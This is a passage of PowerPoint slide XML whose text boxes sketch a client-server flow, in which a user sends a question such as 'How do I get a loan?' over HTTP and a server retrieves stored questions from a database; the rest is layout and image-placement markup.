              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="6773" algn="r">
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>awn</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ng</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="object 80"/>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75" name="object 75"/>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7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>User asks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-520"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76" name="object 76"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a loan?”)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="object 77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9667242"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78" name="object 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63554" y="3662791"/>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245717"/>
            <a:ext cx="3605107" cy="3371427"/>
            <a:chOff x="6209088" y="934288"/>
            <a:chExt cx="2703830" cy="252857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052068" y="940473"/>
              <a:ext cx="683679" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7712913" y="944714"/>
              <a:ext cx="1157358" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7674864" y="1062228"/>
              <a:ext cx="1237475" cy="729992"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>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10" name="object 10"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2298960" y="3503061"/>
            <a:ext cx="5149427" cy="1507067"/>
            <a:chOff x="1724220" y="2627296"/>
            <a:chExt cx="3862070" cy="1130300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>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13" name="object 13"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732029" y="3166492"/>
            <a:ext cx="1539240" cy="1494426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>retrieves </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>questions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>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7" name="object 1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18" name="object 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104986" y="30303"/>
            <a:ext cx="6361007" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5533675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-87" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 1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20" name="object 2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21" name="object 21"/>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22" name="object 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10253472" y="1487408"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="7690103" y="1115555"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8430762" y="1115555"/>
              <a:ext cx="458723" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>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5" name="object 25"/>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8638022" y="1246644"/>
              <a:ext cx="251456" cy="158483"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7690103" y="1344167"/>
              <a:ext cx="1207007" cy="109727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>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29" name="object 29"/>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0" name="object 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10396371" y="1552587"/>
            <a:ext cx="1458807" cy="220133"/>
            <a:chOff x="7797278" y="1164440"/>
            <a:chExt cx="1094105" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="object 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8432292" y="1178039"/>
              <a:ext cx="458718" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 32"/>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3" name="object 33"/>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4" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7797278" y="1164440"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>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36" name="object 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10239237" y="1798319"/>
            <a:ext cx="497840" cy="591820"/>
            <a:chOff x="7679428" y="1348739"/>
            <a:chExt cx="373380" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7679428" y="1348739"/>
              <a:ext cx="373374" cy="443478"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="38" name="object 38"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7725854" y="1372057"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 39"/>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40" name="object 40"/>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1" name="object 41"/>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42" name="object 42"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2834199"/>
            <a:ext cx="2479040" cy="1144692"/>
            <a:chOff x="0" y="2125649"/>
            <a:chExt cx="1859280" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="object 44"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2131834"/>
              <a:ext cx="683015" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="45" name="object 45"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="660175" y="2136076"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 46"/>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47" name="object 47"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="621791" y="2253995"/>
              <a:ext cx="1237487" cy="729983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="object 48"/>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49" name="object 49"/>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50" name="object 50"/>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51" name="object 51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="849376" y="3076432"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="637031" y="2307323"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="object 52"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1377695" y="2307323"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="object 53"/>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54" name="object 54"/>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55" name="object 55"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1584950" y="2438385"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="object 56"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId16" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="637031" y="2534391"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="object 57"/>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58" name="object 58"/>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59" name="object 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992725" y="3141071"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="744543" y="2355803"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="60" name="object 60"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId17" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1379219" y="2369807"/>
              <a:ext cx="460235" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="object 61"/>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62" name="object 62"/>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63" name="object 63"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId18" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="744543" y="2355803"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273725" y="3603749"/>
            <a:ext cx="1148080"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65" name="object 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="837183" y="3387337"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="627887" y="2540502"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="66" name="object 66"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId19" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="627887" y="2540502"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="67" name="object 67"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId20" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="673114" y="2563418"/>
              <a:ext cx="277416" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="object 68"/>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69" name="object 69"/>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70" name="object 70"/>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71" name="object 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367764" y="3050012"/>
            <a:ext cx="291253" cy="209973"/>
            <a:chOff x="275823" y="2287509"/>
            <a:chExt cx="218440" cy="157480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="72" name="object 72"/>
            <p:cNvPicPr/>
